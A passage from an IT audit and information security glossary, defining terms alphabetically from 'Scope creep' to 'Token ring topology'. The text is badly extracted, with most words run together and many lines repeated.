defined so that each sampling unit can belong to only one stratum stratification defined,sothateachsamplingunitcanbelongtoonlyonestratum
Scheduling Amethodusedintheinformationprocessingfacility(IPF)todetermineandestablishthe
sequenceofcomputerjobprocessing
Term Definition
Scopecreep Alsocalledrequirementcreep,thisreferstouncontrolledchangesinaprojectsscope.
ScopeNote:Scopecreepcanoccurwhenthescopeofaprojectisnotproperlydefined,
documentedandcontrolled.Typically,thescopeincreaseconsistsofeithernewproductsor
newfeaturesofalreadyapprovedproducts.Hence,theprojectteamdriftsawayfromits
originalpurpose.Becauseofonestendencytofocusononlyonedimensionofaproject,scope
creepcanalsoresultinaprojectteamoverrunningitsoriginalbudgetandschedule.For
example scope creep can be a result of poor change control lack of proper identification of example,scopecreepcanbearesultofpoorchangecontrol,lackofproperidentificationof
whatproductsandfeaturesarerequiredtobringabouttheachievementofprojectobjectives
inthefirstplace,oraweakprojectmanagerorexecutivesponsor.
Scopingprocess Identifyingtheboundaryorextenttowhichaprocess,procedure,certification,contract,etc.,
applies
Screeningrouters Arouterconfiguredtopermitordenytrafficbasedonasetofpermissionrulesinstalledbythe g g p y p y
administrator
SecureElectronic
Transaction(SET)
Astandardthatwillensurethatcreditcardandassociatedpaymentorderinformationtravels
safelyandsecurelybetweenthevariousinvolvedpartiesontheInternet.
SecureMultipurpose
InternetMail
Extensions(S/MIME)
Providescryptographicsecurityservicesforelectronicmessagingapplications:authentication,
messageintegrityandnonrepudiationoforigin(usingdigitalsignatures)andprivacyanddata
security(usingencryption)toprovideaconsistentwaytosendandreceiveMIMEdata.(RFC
2311)
SecureShell(SSH) Networkprotocolthatusescryptographytosecurecommunication,remotecommandline
loginandremotecommandexecutionbetweentwonetworkedcomputers
SecureSocketsLayer
(SSL)
AprotocolthatisusedtotransmitprivatedocumentsthroughtheInternet
ScopeNote:TheSSLprotocolusesaprivatekeytoencryptthedatathataretobetransferred
h h h throughtheSSLconnection.
Securityadministrator Thepersonresponsibleforimplementing,monitoringandenforcingsecurityrulesestablished
andauthorizedbymanagement
SecurityasaService
(SecaaS)
Thenextgenerationofmanagedsecurityservicesdedicatedtothedelivery,overtheInternet,
ofspecializedinformationsecurityservices.
Securityawareness Theextenttowhicheverymemberofanenterpriseandeveryotherindividualwhopotentially
has access to the enterprise's informaon understand: hasaccesstotheenterprise'sinformaonunderstand:
Securityandthelevelsofsecurityappropriatetotheenterprise
Theimportanceofsecurityandconsequencesofalackofsecurity
Theirindividualresponsibilitiesregardingsecurity(andactaccordingly)
ScopeNote:ThisdefinitionisbasedonthedefinitionforITsecurityawarenessasdefinedin
Implementation Guide: How to Make Your Organization Aware of IT Security European ImplementationGuide:HowtoMakeYourOrganizationAwareofITSecurity,European
Security Forum (ESF), London, 1993
Term Definition
Securityawareness
campaign
Apredefined,organizednumberofactionsaimedatimprovingthesecurityawarenessofa
special target audience about a specific security problem campaign specialtargetaudienceaboutaspecificsecurityproblem
Eachsecurityawarenessprogramconsistsofanumberofsecurityawarenesscampaigns.
Securityawareness
coordinator
Theindividualresponsibleforsettingupandmaintainingthesecurityawarenessprogramand
coordinatingthedifferentcampaignsandeffortsofthevariousgroupsinvolvedintheprogram
He/sheisalsoresponsibleformakingsurethatallmaterialsareprepared,advocates/trainers
aretrained,campaignsarescheduled,eventsarepublicizedandtheprogramasawhole
movesforward.
Securityawareness
program
Aclearlyandformallydefinedplan,structuredapproach,andsetofrelatedactivitiesand
procedureswiththeobjectiveofrealizingandmaintainingasecurityawareculture p g p j g g y
ScopeNote:Thisdefinitionclearlystatesthatitisaboutrealizingandmaintainingasecurity
awareculture,meaningattainingandsustainingsecurityawarenessatalltimes.Thisimplies
thatasecurityawarenessprogramisnotaonetimeeffort,butacontinuousprocess.
Securityforum Responsibleforinformationsecuritygovernancewithintheenterprise
ScopeNote:Asecurityforumcanbepartofanexistingmanagementbody.Because
informationsecurityisabusinessresponsibilitysharedbyallmembersoftheexecutive
managementteam,theforumneedstoinvolveexecutivesfromallsignificantpartsofthe
enterprise.Typically,asecurityforumhasthefollowingtasksandresponsibilities:
Definingasecuritystrategyinlinewiththebusinessstrategy
Identifyingsecurityrequirements
Establishingasecuritypolicy
Drawingupanoverallsecurityprogramorplan
Approvingmajorinitiativestoenhanceinformationsecurity
Reviewingandmonitoringinformationsecurityincidents
Monitoringsignificantchangesintheexposureofinformationassetstomajorthreats
Securityincident Aseriesofunexpectedeventsthatinvolvesanattackorseriesofattacks(compromiseand/or
breachofsecurity)atoneormoresites
Asecurityincidentnormallyincludesanestimationofitslevelofimpact.Alimitednumberof
impact levels are defined and for each the specific actions required and the people who need impactlevelsaredefinedand,foreach,thespecificactionsrequiredandthepeoplewhoneed
tobenotifiedareidentified.
Term Definition
Securitymanagement Theprocessofestablishingandmaintainingsecurityforacomputerornetworksystem
ScopeNote:Thestagesoftheprocessofsecuritymanagementincludepreventionofsecurity
problems,detectionofintrusions,andinvestigationofintrusionsandresolution.Innetwork
management,thestagesare:controllingaccesstothenetworkandresources,finding
intrusions,identifyingentrypointsforintrudersandrepairingorotherwiseclosingthose
avenuesofaccess.
Securitymetrics Astandardofmeasurementusedinmanagementofsecurityrelatedactivities
Securityperimeter Theboundarythatdefinestheareaofsecurityconcernandsecuritypolicycoverage
Securitypolicy Ahighleveldocumentrepresentinganenterprisesinformationsecurityphilosophyand
commitment
Securityprocedures Theformaldocumentationofoperationalstepsandprocessesthatspecifyhowsecuritygoals
andobjectivessetforwardinthesecuritypolicyandstandardsaretobeachieved j y p y
Securitysoftware Softwareusedtoadministersecurity,whichusuallyincludesauthenticationofusers,access
grantingaccordingtopredefinedrules,monitoringandreportingfunctions
Securitystandards Practices,directives,guidelines,principlesorbaselinesthatstatewhatneedstobedoneand
focusareasofcurrentrelevanceandconcern;theyareatranslationofissuesalready
mentionedinthesecuritypolicy
Securitytesting Ensuringthatthemodifiedornewsystemincludesappropriatecontrolsanddoesnot
introduceanysecurityholesthatmightcompromiseothersystemsormisusesofthesystemor
itsinformation
Security/transaction
risk
Thecurrentandprospectiverisktoearningsandcapitalarisingfromfraud,errorandthe
inabilitytodeliverproductsorservices,maintainacompetitiveposition,andmanage
information
ScopeNote:Securityriskisevidentineachproductandserviceoffered,anditencompasses
productdevelopmentanddelivery,transactionprocessing,systemsdevelopment,computing
systems,complexityofproductsandservicesandtheinternalcontrolenvironment.Ahigh
levelofsecurityriskmayexistwithInternetbankingproducts,particularlyifthoselinesof
businessarenotadequatelyplanned,implementedandmonitored.
Segregation/separatio
nofduties(SoD)
Abasicinternalcontrolthatpreventsordetectserrorsandirregularitiesbyassigningto
separateindividualstheresponsibilityforinitiatingandrecordingtransactionsandforthe
custodyofassets
ScopeNote:Segregation/separationofdutiesiscommonlyusedinlargeITorganizationsso
that no single person is in a position to introduce fraudulent or malicious code without thatnosinglepersonisinapositiontointroducefraudulentormaliciouscodewithout
detection.
Sensitivity Ameasureoftheimpactthatimproperdisclosureofinformationmayhaveonanenterprise
Term Definition
Sequencecheck Verificationthatthecontrolnumberfollowssequentiallyandanycontrolnumbersoutof
sequence are rejected or noted on an exception report for further research sequencearerejectedornotedonanexceptionreportforfurtherresearch
ScopeNote:Canbealphaornumericandusuallyutilizesakeyfield
Sequentialfile Acomputerfilestorageformatinwhichonerecordfollowsanother
ScopeNote:Recordscanbeaccessedsequentiallyonly.Itisrequiredwithmagnetictape.
Servicebureau Acomputerfacilitythatprovidesdataprocessingservicestoclientsonacontinualbasis
Servicecatalogue StructuredinformationonallITservicesavailabletocustomers
Servicedelivery Directlyrelatedtothebusinessneeds,SDOisthelevelofservicestobereachedduringthe y
objective(SDO)
y , g
alternateprocessmodeuntilthenormalsituationisrestored
Servicedesk ThepointofcontactwithintheITorganizationforusersofITservices
Servicelevel
agreement(SLA)
Anagreement,preferablydocumented,betweenaserviceproviderandthe
customer(s)/user(s)thatdefinesminimumperformancetargetsforaserviceandhowtheywill
bemeasured
Serviceprovider Anorganizationsupplyingservicestooneormore(internalorexternal)customers
ServiceSetIdentifier
(SSID)
A32characteruniqueidentifierattachedtotheheaderofpacketssentoverawirelesslocal
areanetwork(WLAN)thatactsasapasswordwhenamobiledevicetriestoconnecttothe
basestationsubsystem(BSS).
ScopeNote:TheSSIDdifferentiatesoneWLANfromanothersoallaccesspointsandall
devicesattemptingtoconnecttoaspecificWLANmustusethesameSSID.Adevicewillnotbe
permittedtojointheBSSunlessitcanprovidetheuniqueSSID.BecauseanSSIDcanbesniffed
inplaintextfromapacket,itdoesnotsupplyanysecuritytothenetwork.AnSSIDisalso
referredtoasanetworkname,becauseitisanamethatidentifiesawirelessnetwork.
Serviceuser Theorganizationusingtheoutsourcedservice.
Serviceoriented
architecture (SOA)
Acloudbasedlibraryofproven,functionalsoftwareappletsthatareabletobeconnected
together to become a useful online application architecture(SOA) togethertobecomeausefulonlineapplication
Servlet AJavaappletorasmallprogramthatrunswithinawebserverenvironment
ScopeNote:AJavaservletissimilartoacommongatewayinterface(CGI)program,butunlike
aCGIprogram,oncestarted,itstaysinmemoryandcanfulfillmultiplerequests,thereby
savingserverexecutiontimeandspeedinguptheservices.
Session border Provide security features for voiceover IP (VoIP) traffic similar to that provided by firewalls Sessionborder
controller(SBC)
ProvidesecurityfeaturesforvoiceoverIP(VoIP)trafficsimilartothatprovidedbyfirewalls
ScopeNote:SBCscanbeconfiguredtofilterspecificVoIPprotocols,monitorfordenialof
service(DOS)attacks,andprovidenetworkaddressandprotocoltranslationfeatures.
Term Definition
Shell Theinterfacebetweentheuserandthesystem
Shell programming A script written for the shell or command line interpreter of an operating system; it is often Shellprogramming Ascriptwrittenfortheshell,orcommandlineinterpreter,ofanoperatingsystem;itisoften
consideredasimpledomainspecificprogramminglanguage
ScopeNote:Typicaloperationsperformedbyshellscriptsincludefilemanipulation,program
executionandprintingtext.Usually,shellscriptreferstoscriptswrittenforaUNIXshell,while
command.com(DOS)andcmd.exe(Windows)commandlinescriptsareusuallycalledbatch
files Many shell script interpreters double as a command line interface such as the various files.Manyshellscriptinterpretersdoubleasacommandlineinterfacesuchasthevarious
UNIXshells,WindowsPowerShellortheMSDOScommand.com.Others,suchasAppleScript,
addscriptingcapabilitytocomputingenvironmentslackingacommandlineinterface.Other
examplesofprogramminglanguagesprimarilyintendedforshellscriptingincludedigital
commandlanguage(DCL)andjobcontrollanguage(JCL).
Significantdeficiency Adeficiencyoracombinationofdeficiencies,ininternalcontrol,thatislessseverethana g y y , ,
materialweakness,yetimportantenoughtomeritattentionbythoseresponsibleforoversight
ScopeNote:Amaterialweaknessisasignificantdeficiencyoracombinationofsignificant
deficienciesthatresultsinmorethanaremotelikelihoodofanundesirableevent(s)notbeing
preventedordetected.
Signonprocedure Theprocedureperformedbyausertogainaccesstoanapplicationoroperatingsystem
ScopeNote:Iftheuserisproperlyidentifiedandauthenticatedbythesystemssecurity,they
willbeabletoaccessthesoftware.
Simplefailover Afailoverprocessinwhichtheprimarynodeownstheresourcegroup
ScopeNote:Thebackupnoderunsanoncriticalapplication(e.g.,adevelopmentortest
environment)andtakesoverthecriticalresourcegroup,butnotviceversa.
SimpleMailTransfer
Protocol(SMTP)
Thestandardelectronicmail(email)protocolontheInternet
Term Definition
SimpleObjectAccess
Protocol (SOAP)
Aplatformindependentformattedprotocolbasedonextensiblemarkuplanguage(XML)
enabling applications to communicate with each other over the Internet Protocol(SOAP) enablingapplicationstocommunicatewitheachotherovertheInternet
ScopeNote:UseofSOAPmayprovideasignificantsecurityrisktowebapplicationoperations
becauseuseofSOAPpiggybacksontoawebbaseddocumentobjectmodelandistransmitted
viaHyperTextTransferProtocol(HTTP)(port80)topenetrateserverfirewalls,whichare
usuallyconfiguredtoacceptport80andport21FileTransferProtocol(FTP)requests.Web
based document models define how objects on a web page are associated with each other and baseddocumentmodelsdefinehowobjectsonawebpageareassociatedwitheachotherand
howtheycanbemanipulatedwhilebeingsentfromaservertoaclientbrowser.SOAP
typicallyreliesonXMLforpresentationformattingandalsoaddsappropriateHTTPbased
headerstosendit.SOAPformsthefoundationlayerofthewebservicesstack,providinga
basicmessagingframeworkonwhichmoreabstractlayerscanbuild.Thereareseveral
differenttypesofmessagingpatternsinSOAP,butbyfarthemostcommonistheRemote
Procedure Call (RPC) pattern in which one network node (the client) sends a request message ProcedureCall(RPC)pattern,inwhichonenetworknode(theclient)sendsarequestmessage
to another node (the server) and the server immediately sends a response message to the
Singlefactor
authentication(SFA)
AuthenticationprocessthatrequiresonlytheuserIDandpasswordtograntaccess
Singlepointoffailure Aresourcewhoselosswillresultinthelossofserviceorproduction
Skill Thelearnedcapacitytoachievepredeterminedresults
Slacktime(float) Timeintheprojectschedule,theuseofwhichdoesnotaffecttheprojectscriticalpath;the
minimumtimetocompletetheprojectbasedontheestimatedtimeforeachprojectsegment
andtheirrelationships
ScopeNote:Slacktimeiscommonlyreferredtoas"float"andgenerallyisnot"owned"by
eitherpartytothetransaction.
SMART Specific,measurable,attainable,realisticandtimely,generallyusedtodescribeappropriately
setgoals
Smartcard Asmallelectronicdevicethatcontainselectronicmemory,andpossiblyanembedded
integratedcircuit
ScopeNote:Smartcardscanbeusedforanumberofpurposesincludingthestorageofdigital
certificatesordigitalcash,ortheycanbeusedasatokentoauthenticateusers.
Sniff Theactofcapturingnetworkpackets,includingthosenotnecessarilydestinedforthe
computerrunningthesniffingsoftware
Sniffing The process by which data traversing a network are captured or monitored Sniffing Theprocessbywhichdatatraversinganetworkarecapturedormonitored
Socialengineering Anattackbasedondeceivingusersoradministratorsatthetargetsiteintorevealing
confidentialorsensitiveinformation
Term Definition
Software Programsandsupportingdocumentationthatenableandfacilitateuseofthecomputer
ScopeNote:Softwarecontrolstheoperationofthehardwareandtheprocessingofdata.
Softwareasaservice
(SaaS)
Offersthecapabilitytousetheprovidersapplicationsrunningoncloudinfrastructure.The
applicationsareaccessiblefromvariousclientdevicesthroughathinclientinterfacesuchasa
web browser (e.g., webbased email). webbrowser(e.g.,webbasedemail).
Softwareasaservice,
platformasaservice
andinfrastructureas
aservice(SPI)
Theacronymusedtorefertothethreeclouddeliverymodels
Sourcecode Thelanguageinwhichaprogramiswritten g g p g
ScopeNote:Sourcecodeistranslatedintoobjectcodebyassemblersandcompilers.Insome
cases,sourcecodemaybeconvertedautomaticallyintoanotherlanguagebyaconversion
program.Sourcecodeisnotexecutablebythecomputerdirectly.Itmustfirstbeconverted
intoamachinelanguage.
Sourcecodecompare Providesassurancethatthesoftwarebeingauditedisthecorrectversionofthesoftware,by
program providingameaningfullistingofanydiscrepanciesbetweenthetwoversionsoftheprogram
Sourcedocument Theformusedtorecorddatathathavebeencaptured
ScopeNote:Asourcedocumentmaybeapieceofpaper,aturnarounddocumentoranimage
displayedforonlinedatainput.
S li f d Oft d i d i i i l i t ft i ti ti Sourcelinesofcode
(SLOC)
Oftenusedinderivingsinglepointsoftwaresizeestimations
Sourcerouting
specification
Atransmissiontechniquewherethesenderofapacketcanspecifytheroutethatpacket
shouldfollowthroughthenetwork
Spam Computergeneratedmessagessentasunsolicitedadvertising
Spanningport Aportconfiguredonanetworkswitchtoreceivecopiesoftrafficfromoneormoreotherports
on the switch ontheswitch
Spearphishing Anattackwheresocialengineeringtechniquesareusedtomasqueradeasatrustedpartyto
obtainimportantinformationsuchaspasswordsfromthevictim
Splitdatasystems Aconditioninwhicheachofanenterprisesregionallocationsmaintainsitsownfinancialand
operationaldatawhilesharingprocessingwithanenterprisewide,centralizeddatabase
Scope Note: Split data systems permit easy sharing of data while maintaining a certain level of ScopeNote:Splitdatasystemspermiteasysharingofdatawhilemaintainingacertainlevelof
autonomy.
Splitdomainname
system(DNS)
AnimplementationofDNSthatisintendedtosecureresponsesprovidedbytheserversuch
thatdifferentresponsesaregiventointernalvs.externalusers
Term Definition
Splitknowledge/split
key
Asecuritytechniqueinwhichtwoormoreentitiesseparatelyholddataitemsthatindividually
convey no knowledge of the information that results from combining the items; a condition key conveynoknowledgeoftheinformationthatresultsfromcombiningtheitems;acondition
underwhichtwoormoreentitiesseparatelyhavekeycomponentsthatindividuallyconveyno
knowledgeoftheplaintextkeythatwillbeproducedwhenthekeycomponentsarecombined
inthecryptographicmodule
Spoofing Fakingthesendingaddressofatransmissioninordertogainillegalentryintoasecuresystem
SPOOL(simultaneous Anautomatedfunctionthatcanbebasedonanoperatingsystemorapplicationinwhich SPOOL(simultaneous
peripheraloperations
online)
Anautomatedfunctionthatcanbebasedonanoperatingsystemorapplicationinwhich
electronicdatabeingtransmittedbetweenstorageareasarespooledorstoreduntilthe
receivingdeviceorstorageareaispreparedandabletoreceivetheinformation
ScopeNote:Spoolallowsmoreefficientelectronicdatatransfersfromonedevicetoanother
bypermittinghigherspeedsendingfunctions,suchasinternalmemory,tocontinueonwith
otheroperationsinsteadofwaitingontheslowerspeedreceivingdevice,suchasaprinter. otheroperationsinsteadofwaitingontheslowerspeedreceivingdevice,suchasaprinter.
Spyware Softwarewhosepurposeistomonitoracomputerusersactions(e.g.,websitesvisited)and
reporttheseactionstoathirdparty,withouttheinformedconsentofthatmachinesowneror
legitimateuser
ScopeNote:Aparticularlymaliciousformofspywareissoftwarethatmonitorskeystrokesto
obtainpasswordsorotherwisegatherssensitiveinformationsuchascreditcardnumbers,
whichitthentransmitstoamaliciousthirdparty.Thetermhasalsocometorefermore
broadlytosoftwarethatsubvertsthecomputersoperationforthebenefitofathirdparty.
SQLinjection Resultsfromfailureoftheapplicationtoappropriatelyvalidateinput.Whenspeciallycrafted
ll d i i i f SQL i d i h lid i f SQL usercontrolledinputconsistingofSQLsyntaxisusedwithoutpropervalidationaspartofSQL
queries,itispossibletogleaninformationfromthedatabaseinwaysnotenvisagedduring
applicationdesign.(MITRE)
Stagegate Apointintimewhenaprogramisreviewedandadecisionismadetocommitexpendituresto
thenextsetofactivitiesonaprogramorproject,tostoptheworkaltogether,ortoputahold
onexecutionoffurtherwork
Stakeholder Anyone who has a responsibility for an expectation from or some other interest in the Stakeholder Anyonewhohasaresponsibilityfor,anexpectationfromorsomeotherinterestinthe
enterprise.
ScopeNote:Examples:shareholders,users,government,suppliers,customersandthepublic
Standard Amandatoryrequirement,codeofpracticeorspecificationapprovedbyarecognizedexternal
standards organization such as International Organization for Standardization (ISO) standardsorganization,suchasInternationalOrganizationforStandardization(ISO)
Standingdata Permanentreferencedatausedintransactionprocessing
ScopeNote:Thesedataarechangedinfrequently,suchasaproductpricefileoranameand
addressfile.
Term Definition
Startopology Atypeoflocalareanetwork(LAN)architecturethatutilizesacentralcontrollertowhichall
nodes are directly connected nodesaredirectlyconnected
ScopeNote:Withstartopology,alltransmissionsfromonestationtoanotherpassthrough
thecentralcontrollerwhichisresponsibleformanagingandcontrollingallcommunication.
Thecentralcontrolleroftenactsasaswitchingdevice.
Statefulinspection Afirewallarchitecturethattrackseachconnectiontraversingallinterfacesofthefirewalland
makes sure they are valid. makessuretheyarevalid.
Staticanalysis Analysisofinformationthatoccursonanoncontinuousbasis;alsoknownasintervalbased
analysis
Statisticalsampling Amethodofselectingaportionofapopulation,bymeansofmathematicalcalculationsand
probabilities,forthepurposeofmakingscientificallyandmathematicallysoundinferences
regardingthecharacteristicsoftheentirepopulation
Statutory Lawscreatedbygovernmentinstitutions y
requirements
y g
Storagearea
networks(SANs)
Avariationofalocalareanetwork(LAN)thatisdedicatedfortheexpresspurposeof
connectingstoragedevicestoserversandothercomputingdevices
ScopeNote:SANscentralizetheprocessforthestorageandadministrationofdata.
Strategicplanning Theprocessofdecidingontheenterprisesobjectives,onchangesintheseobjectives,andthe
policiestogoverntheiracquisitionanduse
Strengths,
weaknesses,
opportunitiesand
threats(SWOT)
Acombinationofanorganizationalauditlistingtheenterprisesstrengthsandweaknessesand
anenvironmentalscanoranalysisofexternalopportunitiesandthreats
Structured
i
Atopdowntechniqueofdesigningprogramsandsystemsthatmakesprogramsmore
d bl li bl d il i i d programming readable,morereliableandmoreeasilymaintained
StructuredQuery
Language(SQL)
Theprimarylanguageusedbybothapplicationprogrammersandendusersinaccessing
relationaldatabases
Subjectmatter ThespecificinformationsubjecttoanISauditorsreportandrelatedprocedures,whichcan
includethingssuchasthedesignoroperationofinternalcontrolsandcompliancewithprivacy
practicesorstandardsorspecifiedlawsandregulations(areaofactivity)
Substantivetesting Obtainingauditevidenceonthecompleteness,accuracyorexistenceofactivitiesor
transactionsduringtheauditperiod
Sufficientaudit
evidence
Auditevidenceissufficientifitisadequate,convincingandwouldleadanotherISauditorto
formthesameconclusions.
Sufficientevidence Themeasureofthequantityofauditevidence;supportsallmaterialquestionstotheaudit
objective and scope objectiveandscope
ScopeNote:Seeevidence
Term Definition
Sufficientinformation Informationissufficientwhenevaluatorshavegatheredenoughofittoformareasonable
conclusion For information to be sufficient however it must first be suitable conclusion.Forinformationtobesufficient,however,itmustfirstbesuitable.
Suitableinformation Relevant(i.e.,fitforitsintendedpurpose),reliable(i.e.,accurate,verifiableandfroman
objectivesource)andtimely(i.e.,producedandusedinanappropriatetime
frame)information frame)information
Supervisorycontrol
anddataacquisition
(SCADA)
Systemsusedtocontrolandmonitorindustrialandmanufacturingprocesses,andutility
facilities
Supplychain Aconceptthatallowsanenterprisetomoreeffectivelyandefficientlymanagetheactivitiesof pp y
management(SCM)
p p y y g
design,manufacturing,distribution,serviceandrecyclingofproductsandserviceitscustomers
Surgesuppressor Filtersoutelectricalsurgesandspikes
Suspensefile Acomputerfileusedtomaintaininformation(transactions,paymentsorotherevents)until
theproperdispositionofthatinformationcanbedetermined
ScopeNote:Oncetheproperdispositionoftheitemisdetermined,itshouldberemovedfrom
thesuspensefileandprocessedinaccordancewiththeproperproceduresforthatparticular
transaction.Twoexamplesofitemsthatmaybeincludedinasuspensefilearereceiptofa
paymentfromasourcethatisnotreadilyidentifiedordatathatdonotyethaveanidentified
matchduringmigrationtoanewapplication.
S it h T i ll i t d d t li k l d i it h bl l l t k (LAN) Switches Typicallyassociatedasadatalinklayerdevice,switchesenablelocalareanetwork(LAN)
segmentstobecreatedandinterconnected,whichhastheaddedbenefitofreducingcollision
domainsinEthernetbasednetworks.
Symmetrickey
encryption
Systeminwhichadifferentkey(orsetofkeys)isusedbyeachpairoftradingpartnersto
ensurethatnooneelsecanreadtheirmessages
The same key is used for encryption and decryption See also Private Key Cryptosystem Thesamekeyisusedforencryptionanddecryption.SeealsoPrivateKeyCryptosystem.
Synchronize(SYN) Aflagsetintheinitialsetuppacketstoindicatethatthecommunicatingpartiesare
synchronizingthesequencenumbersusedforthedatatransmission
Synchronous
transmission
Blockatatimedatatransmission
Term Definition
Systemdevelopment
life cycle (SDLC)
Thephasesdeployedinthedevelopmentoracquisitionofasoftwaresystem
lifecycle(SDLC)
ScopeNote:SDLCisanapproachusedtoplan,design,develop,testandimplementan
applicationsystemoramajormodificationtoanapplicationsystem.TypicalphasesofSDLC
includethefeasibilitystudy,requirementsstudy,requirementsdefinition,detaileddesign,
programming,testing,installationandpostimplementationreview,butnottheservice
deliveryorbenefitsrealizationactivities.
Systemexit Specialsystemsoftwarefeaturesandutilitiesthatallowtheusertoperformcomplexsystem Systemexit Specialsystemsoftwarefeaturesandutilitiesthatallowtheusertoperformcomplexsystem
maintenance
ScopeNote:Useofsystemexitsoftenpermitstheusertooperateoutsideofthesecurity
accesscontrolsystem.
Systemflowchart Graphicrepresentationsofthesequenceofoperationsinaninformationsystemorprogram
ScopeNote:Informationsystemflowchartsshowhowdatafromsourcedocumentsflow
throughthecomputertofinaldistributiontousers.Symbolsusedshouldbetheinternationally
acceptedstandard.Systemflowchartsshouldbeupdatedwhennecessary.
Systemhardening Aprocesstoeliminateasmanysecurityrisksaspossiblebyremovingallnonessentialsoftware
programs,protocols,servicesandutilitiesfromthesystem
Systemnarrative Providesanoverviewexplanationofsystemflowcharts,withexplanationofkeycontrolpoints
andsysteminterfaces
Systemofinternal
control
Thepolicies,standards,plansandprocedures,andorganizationalstructuresdesignedto
providereasonableassurancethatenterpriseobjectiveswillbeachievedandundesiredevents
willbepreventedordetectedandcorrected
Systemsoftware Acollectionofcomputerprogramsusedinthedesign,processingandcontrolofall
applications
ScopeNote:Theprogramsandprocessingroutinesthatcontrolthecomputerhardware,
incl ding the operating s stem and tilit programs includingtheoperatingsystemandutilityprograms
Systemtesting Testingconductedonacomplete,integratedsystemtoevaluatethesystem'scompliancewith
itsspecifiedrequirements
ScopeNote:Systemtestprocedurestypicallyareperformedbythesystemmaintenancestaff
intheirdevelopmentlibrary.
Systems acquisition Procedures established to purchase application software, or an upgrade, including evaluation Systemsacquisition
process
Proceduresestablishedtopurchaseapplicationsoftware,oranupgrade,includingevaluation
ofthesupplier'sfinancialstability,trackrecord,resourcesandreferencesfromexisting
customers
Systemsanalysis Thesystemsdevelopmentphaseinwhichsystemsspecificationsandconceptualdesignsare
developedbasedonenduserneedsandrequirements
Tablelookup Usedtoensurethatinputdataagreewithpredeterminedcriteriastoredinatable
Term Definition
Tangibleasset Anyassetsthathasphysicalform
Tape management A system software tool that logs monitors and directs computer tape usage Tapemanagement
system(TMS)
Asystemsoftwaretoolthatlogs,monitorsanddirectscomputertapeusage
Taps Wiringdevicesthatmaybeinsertedintocommunicationlinksforusewithanalysisprobes,
localareanetwork(LAN)analyzersandintrusiondetectionsecuritysystems
Target Personorassetselectedastheaimofanattack
Tcpdump Anetworkmonitoringanddataacquisitiontoolthatperformsfiltertranslation,packet
acquisition and packet display acquisitionandpacketdisplay
Technical
infrastructuresecurity
Referstothesecurityoftheinfrastructurethatsupportstheenterpriseresourceplanning
(ERP)networkingandtelecommunications,operatingsystems,anddatabases
Technology
infrastructure
Technology,humanresources(HR)andfacilitiesthatenabletheprocessinganduseof
applications
Technology Aplanforthetechnology,humanresourcesandfacilitiesthatenablethecurrentandfuture gy
infrastructureplan
p gy,
processinganduseofapplications
Telecommunications Electroniccommunicationbyspecialdevicesoverdistancesorarounddevicesthatpreclude
directinterpersonalexchange
Teleprocessing Usingtelecommunicationsfacilitiesforhandlingandprocessingofcomputerizedinformation
Telnet Networkprotocolusedtoenableremoteaccesstoaservercomputer
ScopeNote:Commandstypedarerunontheremoteserver.
TerminalAccess
ControllerAccess
ControlSystemPlus
(TACACS+)
Anauthenticationprotocol,oftenusedbyremoteaccessservers
T f f A d t th t fi li t' d IS dit ' t f i i t Termsofreference Adocumentthatconfirmsaclient'sandanISauditor'sacceptanceofareviewassignment
Testdata Simulatedtransactionsthatcanbeusedtotestprocessinglogic,computationsandcontrols
actuallyprogrammedincomputerapplications
Individualprogramsoranentiresystemcanbetested.
ScopeNote:ThistechniqueincludesIntegratedTestFacilities(ITFs)andBaseCaseSystem
Evaluations(BCSEs).
Testgenerators Softwareusedtocreatedatatobeusedinthetestingofcomputerprograms
Testprograms Programsthataretestedandevaluatedbeforeapprovalintotheproductionenvironment
Scope Note: Test programs through a series of change control moves migrate from the test ScopeNote:Testprograms,throughaseriesofchangecontrolmoves,migratefromthetest
environmenttotheproductionenvironmentandbecomeproductionprograms.
Term Definition
Testtypes Testtypesinclude:
Checklist testCopies of the business continuity plan (BCP) are distributed to appropriate ChecklisttestCopiesofthebusinesscontinuityplan(BCP)aredistributedtoappropriate
personnelforreview
StructuredwalkthroughIdentifiedkeypersonnelwalkthroughtheplantoensurethatthe
planaccuratelyreflectstheenterprise'sabilitytorecoversuccessfully
SimulationtestAlloperationalandsupportpersonnelareexpectedtoperformasimulated
emergencyasapracticesession
Parallel TestCritical systems are run at alternate site (hot cold warm or reciprocal) ParallelTestCriticalsystemsarerunatalternatesite(hot,cold,warmorreciprocal)
CompleteinterruptiontestDisasterisreplicated,normalproductionisshutdownwithreal
time recovery process
Testing Theexaminationofasamplefromapopulationtoestimatecharacteristicsofthepopulation
Thirdpartyreview Anindependentauditofthecontrolstructureofaserviceorganization,suchasaservice
bureau,withtheobjectiveofprovidingassurancetotheusersoftheserviceorganizationthat , j p g g
theinternalcontrolstructureisadequate,effectiveandsound
Threat Anything(e.g.,object,substance,human)thatiscapableofactingagainstanassetinamanner
thatcanresultinharm
ScopeNote:Apotentialcauseofanunwantedincident(ISO/IEC13335)
Threatagent Methodsandthingsusedtoexploitavulnerability
ScopeNote:Examplesincludedetermination,capability,motiveandresources.
Threatanalysis Anevaluationofthetype,scopeandnatureofeventsoractionsthatcanresultinadverse
consequences;identificationofthethreatsthatexistagainstenterpriseassets
ScopeNote:Thethreatanalysisusuallydefinesthelevelofthreatandthelikelihoodofit
materializing.
Threatevent Anyeventduringwhichathreatelement/actoractsagainstanassetinamannerthathasthe
potentialtodirectlyresultinharm
Threatvector Thepathorrouteusedbytheadversarytogainaccesstothetarget
Throughput Thequantityofusefulworkmadebythesystemperunitoftime.Throughputcanbemeasured
in instructions per second or some other unit of performance When referring to a data ininstructionspersecondorsomeotherunitofperformance.Whenreferringtoadata
transferoperation,throughputmeasurestheusefuldatatransferrateandisexpressedin
kbps,MbpsandGbps.
Timelines Chronologicalgraphswhereeventsrelatedtoanincidentcanbemappedtolookfor
relationshipsincomplexcases
Scope Note: Timelines can provide simplified visualization for presentation to management ScopeNote:Timelinescanprovidesimplifiedvisualizationforpresentationtomanagement
andothernontechnicalaudiences.
Timelyinformation Producedandusedinatimeframethatmakesitpossibletopreventordetectcontrol
deficienciesbeforetheybecomematerialtoanenterprise
Term Definition
Token Adevicethatisusedtoauthenticateauser,typicallyinadditiontoausernameandpassword
ScopeNote:Atokenisusuallyadevicethesizeofacreditcardthatdisplaysapseudorandom
numberthatchangeseveryfewminutes.
Tokenringtopology Atypeoflocalareanetwork(LAN)ringtopologyinwhichaframecontainingaspecificformat,
calledthetoken,ispassedfromonestationtothenextaroundthering
ScopeNote:Whenastationreceivesthetoken,itisallowedtotransmit.Thestationcansend
asmanyframesasdesireduntilapredefinedtimelimitisreached.Whenastationeitherhas
